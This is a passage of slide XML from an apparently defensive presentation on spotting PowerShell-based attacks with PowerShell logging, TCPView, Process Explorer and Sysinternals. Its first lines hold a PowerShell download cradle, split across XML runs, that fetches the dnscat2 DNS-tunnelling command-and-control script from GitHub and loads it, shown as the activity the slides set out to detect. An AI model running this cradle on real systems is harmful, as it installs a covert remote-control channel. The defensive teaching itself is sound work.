            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>raw.githubusercontent.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lukebaggett</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/dnscat2-powershell/master/dnscat2.ps1')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B013EFAD-21F1-E24D-A751-CAA74F1FF1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721217" y="2258217"/>
            <a:ext cx="4893972" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Created ~37 Events in PowerShell Event Log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4607ED-4CB9-0640-AF05-39A0F8BEC975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3168203" y="961039"/>
            <a:ext cx="4572000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Installation of the PowerShell Module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB138F2-8A6D-314C-B78F-DADF584DF11F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019391" y="2097333"/>
            <a:ext cx="4626140" cy="3574970"/>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7199E37D-8192-3C48-A789-8C38ACE72A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7447962" y="4455944"/>
            <a:ext cx="4599204" cy="3574970"/>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EEDCF31B-38C0-EF40-8172-3181422F0713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144834" y="2686265"/>
            <a:ext cx="4718022" cy="3429000"/>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1BDE3BB0-B8E0-0F4E-8FC5-0275585FE6B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589886" y="3957803"/>
            <a:ext cx="4260273" cy="3429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59659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13A13-D7B9-3D48-B8B2-5EE19CD8080A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Running Start-Dnscat2 from PowerShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BEB131F-010C-9E48-BC4C-8F7F322E1E6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313653" y="1706171"/>
            <a:ext cx="5223324" cy="4060101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00E6D0EB-31E1-6F42-8A64-BF8F3EBFA1AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6545052" y="1706170"/>
            <a:ext cx="5216140" cy="4060101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA16BC0-89EB-1F42-918F-892CF5291DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768662" y="3005959"/>
            <a:ext cx="2017986" cy="13663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1201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DFF2DC-F05B-E34B-B52C-75673C282C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="184805"/>
            <a:ext cx="10515600" cy="1505883"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0" err="1"/>
              <a:t>TCPView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0"/>
              <a:t> Sees:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0"/>
              <a:t>Start-DNSCat2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E0DA2FC-26B2-1F43-8804-1C05785DC08A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="10220109" cy="47012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595302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A4F18-D8B2-2E4A-A112-CB146449D407}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516228" y="123820"/>
            <a:ext cx="10515600" cy="948668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Process Explorer Sees:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start-DNSCat2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D13870B-3D01-7443-AADE-DAC6BC908C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2145329" y="1313794"/>
            <a:ext cx="6753973" cy="5420386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2827661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D0148-538A-BD46-99A5-C1B11F20F48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E5BAAF3-CDFF-0C48-B358-AD86AE0FC053}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://redcanary.com/how-to-detect-persistence/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://adsecurity.org/?page_id=4031</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://social.technet.microsoft.com/wiki/contents/articles/33895.windows-event-forwarding-survival-guide.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/archive/blogs/motiba/sysinternals-sysmon-unleashed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3165476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2D103-E35A-7E41-A67F-B8A54D57319F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBF986E-3B8E-CF43-9ACB-AE7AC1D6A6B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2373060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39C83-6784-5D48-BFC8-E854599A5081}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346925" y="468563"/>
            <a:ext cx="5397052" cy="580448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable PowerShell Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5BF7E09-9D06-1B4F-A4AD-9404118B6595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346925" y="6482369"/>
            <a:ext cx="6319527" cy="401423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8FF5E2-E72E-9C4F-9EA4-DFE0D4CD44C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5978797" y="96005"/>
            <a:ext cx="6026213" cy="1325563"/>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0CF9E004-1EB9-8B46-9782-4F8BAC3F79A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274188" y="1492412"/>
            <a:ext cx="7042448" cy="2141806"/>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602D3F58-25D9-4649-997E-58C692E29D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7612670" y="1578139"/>
            <a:ext cx="4305142" cy="3986011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18C0BF9-389C-EA48-8FD7-A0961A501721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6585639" y="5700751"/>
            <a:ext cx="5332173" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>When complete, run “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>gpupdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> /force” from CMD shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Recommend increasing log size due to volume and/or send to SIEM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC1FD34-2FEB-784B-894F-34F38C6FBAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585408" y="3704791"/>
            <a:ext cx="4704117" cy="258520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79537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FDBD29-9EF4-B54C-B915-768CE945DC1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168498" y="133305"/>
            <a:ext cx="4558048" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using PowerShell Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC9822C-4B37-DA4D-A183-52513ED23D12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="335058" y="1458868"/>
            <a:ext cx="5099827" cy="3739343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079B5452-9C05-0044-8EF3-545FDB0EBCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411554" y="732565"/>
            <a:ext cx="5611947" cy="4505571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C3BAA6-DE6F-2B4B-AD29-E4DE7B3D0A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434885" y="244699"/>
            <a:ext cx="4443211" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example Output of “Get-Service”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A screenshot of text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2958E3E6-8A03-8646-92AE-320E8137C073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325109" y="2985351"/>
            <a:ext cx="4172891" cy="373934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74287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DF1F2-EF3E-8447-9DF9-9FD5613442BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9272818D-5AF5-DB4F-B783-EBC092160A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
